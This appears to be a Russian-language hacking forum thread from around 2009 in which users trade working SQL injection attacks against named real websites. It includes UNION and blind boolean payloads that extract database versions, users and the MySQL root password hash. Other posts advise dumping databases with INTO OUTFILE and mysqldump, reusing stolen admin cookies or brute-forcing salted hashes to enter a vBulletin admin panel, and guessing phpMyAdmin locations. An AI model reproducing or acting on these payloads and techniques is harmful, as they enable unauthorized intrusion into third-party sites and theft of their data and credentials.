Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    hh~tp://www.christuniversity.in/secmenudisp.php?MID=7
     
  2. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    ИТД...
     
  3. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    pinky07, зачем усложнять жизнь подзапросами??? это крайняя мера, так как долго и нудно! Этот сайт вообще одна большая скуль =))) каждый параметр и стоило еще чуть посмотреть и вот он
    Code:
    http://www.christuniversity.in/display_article.php?fid=20&arid=13+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7/*
    4.1.22
    christco_christ@localhost
    christ_university
     
    #5423 Kraneg, 14 Feb 2009
    Last edited: 14 Feb 2009
    1 person likes this.
  4. BanQui

    BanQui Elder - Старейшина

    Joined:
    10 Jul 2008
    Messages:
    68
    Likes Received:
    18
    Reputations:
    -11
    Всем привет!! Вот нашел чтото непонятное на одном сайте соединенном с базой www.uro.net.ua/ - www.uro.net.ua/phpmyadmin/
    Вот ошибка www.uro.net.ua/index.php?act=idx&st=-5 - Раскрутить не удается,вообще нивкакую нехочет!!!
     
  5. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    Code:
    SELECT post_id,title,date FROM eA_cp.mainnews ORDER by date DESC LIMIT -5,5
    Инъекция в limit после order by.
    ничего не сделаешь тут.
     
  6. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    В общем есть такой скриптик, там можно управлять базой, но тока при помощи команд, это не пхпмайадмин..

    Просто вводиш команду и тебя слушается база...


    Вот такой вопрос, как сделать через команду sql чтобы сделать бэкап базы?

    К примеру сделать бэкап базы в /www/files

    Очень нужно, прошу помочь, с меня +
     
  7. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    Скажу сразу, там кароче любые команды идут sql, не знаю логина и пароль админа, но пробовал select from.. всё идёт! Что подскажете?
     
  8. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    делал бэкап дб таким способом:

    mysqldump -utracker -ptester. --all-databases > /www/tracker/stats/fuckme.sql

    Выбило:

    Shell command: mysqldump -utracker -paaa67&1!a. --all-databases > /www/tracker/stats/fuckme.sql

    Usage: mysqldump [OPTIONS] database [tables]
    OR mysqldump [OPTIONS] --databases [OPTIONS] DB1 [DB2 DB3...]
    OR mysqldump [OPTIONS] --all-databases [OPTIONS]
    For more options, use mysqldump --help


    Что не так ? :(
     
  9. none222

    none222 Guest

    Reputations:
    0
    Смотря что за субд. В мускуле делается так:

    select * from jops where name='12' into outfile '/www/files/dump.txt'
    или into dumpfile
     
  10. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,193
    Reputations:
    430
    -utracker -ptester. -А чего это такое?
    mysqldump --all-databases > all_databases.sql - Так мне кажется проще...
     
  11. Input

    Input New Member

    Joined:
    27 Jun 2008
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте уважаемые пользователи antichat.
    У меня к вам вопрос. Точнее ситуация, надеюсь, вы поможете мне ее разрешить, т. к ранее я с cookies не сталкивался.

    Вообщем есть сайт назовем его “x”. На его форуме движок, которого vBulletin v3.5.4.
    Я имею логин администратора и его пароль в зашифровки (извлек из базы).

    Так вот как мне подставить cookies? Я понимаю, что это делать надо, наверное, через Opera, но, сколько не пытался, не получалось. Помогите, пожалуйста.

    Заранее огромное спасибо!
     
  12. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    поставь себе денвер, поставь туда булку. и снифай через привокси или аналогичную программу запросы. потом аналогично проделай на нужном тебе сайте.
     
    1 person likes this.
  13. none222

    none222 Guest

    Reputations:
    0
    лучше извлеки из БД ещё и соль и пробрути хеш. По кукам просто в админку не войдёшь - там повторная авторизация
     
    1 person likes this.
  14. MyTHblu

    MyTHblu New Member

    Joined:
    20 Jan 2009
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    ку всем
    моя первая инъекция:
    Code:
    http://www.mega-porno.ru/signup.php/data:text/index.php?category=1'
    не могу подобрать поля, может кто подскажет че да как?!?!?!
     
  15. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    http://www.mega-porno.ru/signup.php/data:text/index.php?category=1')+and+(select+1)=1+and+(banners.cat_link.cat_id='1
    Чтоб интересней было
     
  16. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    MyTHblu,

    http://www.mega-porno.ru/signup.php/data:text/index.php?category=1')+and+ascii(substring((select+user+from+mysql.user+limit+0,1),4,1))=116+--+

    user - root

    http://www.mega-porno.ru/signup.php/data:text/index.php?category=1')+and+ascii(substring((select+password+from+mysql.user+limit+0,1),4,1))>=10+--+

    а хеш сам )
     
  17. Tepp

    Tepp New Member

    Joined:
    6 Feb 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Нет :) Это не тот слу4ай... Просто видимо админ сам сделал, 4тобы перекидывало на гугл
    В общем попасть у меня туда никак не полу4иться 4толь??
     
  18. it's mу

    it's mу Banned

    Joined:
    12 Feb 2009
    Messages:
    47
    Likes Received:
    32
    Reputations:
    5
    видимо нет
     
  19. none222

    none222 Guest

    Reputations:
    0
    а с чего ты взял, что он там установлен. Наверное его там попросту нет, сервер возвращает 404, а админ сделал в этом случае редирект =)
     
  20. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    Имхо,если пхп май админа там нету, то и редирикт на гугл бы не ставили...зайди в раздел обзор уязвимостей в пхп май админ там есть список вероятных расположений... поперебирай их...
     
    #5440 -m0rgan-, 16 Feb 2009
    Last edited: 16 Feb 2009
Thread Status:
Not open for further replies.